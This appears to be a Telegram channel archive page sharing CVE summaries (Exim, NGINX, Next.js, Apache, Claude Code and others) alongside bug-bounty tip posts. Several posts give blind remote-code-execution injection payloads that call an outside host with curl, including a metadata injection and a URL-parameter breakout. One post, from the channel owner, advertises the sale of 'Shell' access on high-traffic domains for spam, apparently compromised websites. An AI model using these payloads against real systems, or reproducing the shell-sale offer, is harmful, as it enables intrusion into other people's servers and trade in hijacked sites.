CVE
Kanalga Telegram’da o‘tish
🔐 CVE | Cyber Vulnerabilities Exchange Group dedicated to sharing and discussing CVEs, zero-days, critical vulnerabilities, exploits, PoCs, and technical analyses of offensive and defensive security. 🟢 Think. Break. Secure. BY: @Mm_fit #cve
Ko'proq ko'rsatishMamlakat belgilanmaganTexnologiyalar & Aralashmalar22 044
3 965
Obunachilar
+2124 soatlar
+717 kunlar
+30230 kunlar
Postlar arxiv
3 965
CVE-2026-45185
Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS closenotify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code.
3 965
CVE-2026-33824
Double free in Windows IKE Extension allows an unauthorized attacker to execute code over a network.
3 965
Hacking a Bug Bounty Platform: JWT Forgery, SSTI & Python Import Hijacking to Root
In this video, we exploit an exposed Git repository, forge JWT tokens, abuse SSTI for code execution, and leverage hijacking to gain root ...
https://youtu.be/4BzZS4ualn0
3 965
😄 Large quantity of Shell available 😎
Customer who wants best high quality Shell 😎
✅ High Traffic Domain
✅ High DA/PA Domain
✅ High DR Domain
✅ Hacklink Market Network Domain
✅ Domain for spam
DM 👉 @Mm_fit 🦊
Channel https://t.me/cve0day
3 965
CVE-2025-59536
Claude Code is an agentic coding tool. Versions before 1.0.111 were vulnerable to Code Injection due to a bug in the startup trust dialog implementation. Claude Code could be tricked to execute code contained in a project before the user accepted the startup trust dialog. Exploiting this requires a user to start Claude Code in an untrusted directory. Users on standard Claude Code auto-update will have received this fix automatically. Users performing manual updates are advised to update to the latest version. This issue is fixed in version 1.0.111.
3 965
+1
Hey Hunter's,
DarkShadow is here back again!
file upload extension bypass for RCE ❌
metadata injection for RCE ✅
File upload vulnerability not just bypassing extension, metadata can be exploited. you can try like:
{"Title\n-if\nsystem('curl burplink)||1\n-Comment":"x"}
guy's if you really love to read then show your love and react❤️
and don't forget to follow me x.com/darkshadow2bd
#bugbounty #bugbountytips #rce
3 965
CVE-2026-42945
NGINX Plus and NGINX Open Source have a vulnerability in the ngxhttprewritemodule module. This vulnerability exists when the rewrite directive is followed by a rewrite, if, or set directive and an unnamed Perl-Compatible Regular Expression (PCRE) capture (for example, $1, $2) with a replacement string that includes a question mark (?). An unauthenticated attacker along with conditions beyond its control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, for systems with Address Space Layout Randomization (ASLR ) disabled, code execution is possible. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
3 965
CVE-2025-70849
Arbitrary File Upload in podinfo thru 6.9.0 allows unauthenticated attackers to upload arbitrary files via crafted POST request to the /store endpoint. The application renders uploaded content without a restrictive Content-Security-Policy (CSP) or adequate Content-Type validation, leading to Stored Cross-Site Scripting (XSS).
3 965
New Videoo: Built a real AI-powered Bug Bounty Agent from scratch using Claude Code, Kali Linux & modern recon tooling 🚀
Automated recon, XSS/SQLi workflows, custom CLAUDE .md system, attack surface mapping & AI-assisted vulnerability hunting.
🎥 https://youtu.be/HRvw79AVoWI
3 965
CVE-2026-44578
Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.
3 965
+2
Hye Hunter's,
DarkShadow is here back again!
Blind RCE in load model💀
if you see any endpoint which load model/function from client side try:
1) you can find ../../ FLI easily 2) system('id'); php functions for code injection 3) \"exec\" try blind rce using your burpcollabGuys, you can join my new YouTube channel. I’ll upload regular videos here. YouTube.com/@darkshadow2bd #rce # bugbounty # bugbountytips
3 965
CVE-2026-23918
Double Free and possible RCE vulnerability in Apache HTTP Server with the HTTP/2 protocol.
This issue affects Apache HTTP Server: 2.4.66.
Users are recommended to upgrade to version 2.4.67, which fixes the issue.
3 965
CVE-2026-3854
An improper neutralization of special elements vulnerability was identified in GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance. During a git push operation, user-supplied push option values were not properly sanitized before being included in internal service headers. Because the internal header format used a delimiter character that could also appear in user input, an attacker could inject additional metadata fields through crafted push option values. This vulnerability was reported via the GitHub Bug Bounty program and has been fixed in GitHub Enterprise Server versions 3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.7 and 3.19.4.
3 965
CVE-2026-31431
In the Linux kernel, the following vulnerability has been resolved:
crypto: algifaead - Revert to operating out-of-place
This mostly reverts commit 72548b093ee3 except for the copying of
the associated data.
There is no benefit in operating in-place in algifaead since the
source and destination come from different mappings. Get rid of
all the complexity added for in-place operation and just copy the
AD directly.
3 965
Hey Hunter's,
DarkShadow is here back again!
Just now, I’ve dropped a new tool on GitHub that can hide anything inside nothing!
This is called Project-Invisible. Here’s the GitHub link:
https://github.com/darkshadow2bd/Project-Invisible
And don’t miss the full video on my YouTube channel:
https://youtu.be/t4yTY0Cg6Ds?si=ZG99_pev06yZFHGi
If you’re interested, you can join my YouTube channel. I’ll upload my methods regulerly in YouTube videos if you guys join here.
#tools #bugbountytips
3 965
+1
Hey Hunter's,
DarkShadow is here back again!
?url= ❌SSRF, ✅RCE
If you find a parameter that passes through the URL, before testing for SSRF, try testing for RCE.
1. bypass: ?url=http://x"; [now add here your blind rce payload] 2. payload: curl${IFS}burp-collab-link;#Now, guys, if you genuinely enjoy reading such methods, show your appreciation. I’ll soon publish a very interesting tool! And Don't forget to follow me x.com/darkshadow2bd #rce #bugbounty #bugbountytips
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
